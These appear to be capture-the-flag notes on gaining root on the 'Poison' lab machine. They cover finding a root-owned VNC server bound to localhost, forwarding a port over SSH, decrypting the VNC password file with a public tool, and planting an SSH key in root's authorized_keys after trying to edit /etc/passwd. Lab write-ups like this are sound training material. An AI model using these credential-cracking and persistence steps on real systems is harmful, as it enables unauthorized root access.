4 privesc vncviewer > root

charix@Poison:~ % netstat -anp tcp
Active Internet connections (including servers)
Proto Recv-Q Send-Q Local Address          Foreign Address        (state)
tcp4       0     44 10.10.10.84.22         10.10.16.5.34152       ESTABLISHED
tcp4       0      0 127.0.0.1.25           *.*                    LISTEN
tcp4       0      0 *.80                   *.*                    LISTEN
tcp6       0      0 *.80                   *.*                    LISTEN
tcp4       0      0 *.22                   *.*                    LISTEN
tcp6       0      0 *.22                   *.*                    LISTEN
tcp4       0      0 127.0.0.1.5801         *.*                    LISTEN
tcp4       0      0 127.0.0.1.5901         *.*                    LISTEN

# vnc is running on it using ps auxww
root     529  0.0  0.9  23608  9020 v0- I    22:54    0:00.04 Xvnc :1 -desktop X -httpd /usr/local/share/tightvnc/classes -auth /root/.Xauthority -geometry 1280x800 -depth 24 -rfbwait 120000 -rfbauth /root/.vnc/passwd -rfbport 5901 -localhost -nolisten tcp :1

# port forwarding to connect to vnc

$ ssh -L 5000:localhost:5901 charix@10.10.10.84

Using https://github.com/trinitronx/vncpasswd.py
# can decrypt secret?

$ /opt/vncpasswd.py/vncpasswd.py -d -f secret
Decrypted Bin Pass= 'VNCP@$$!'
Decrypted Hex Pass= '564e435040242421'

# can use remmina or 
# vncviewer localhost:5000 -passwd secret

# tried sticky bandit, had issues with running /bin/csh 
# made /etc/passwd writable and wrote a new line but then su errors; sudo is missing
# put id_rsa.pub in /root/.ssh/authorized_keys
# finally worked

$ ssh -i id_rsa root@10.10.10.84
root@Poison:~ # whoami;id
root
uid=0(root) gid=0(wheel) groups=0(wheel),5(operator)

Last updated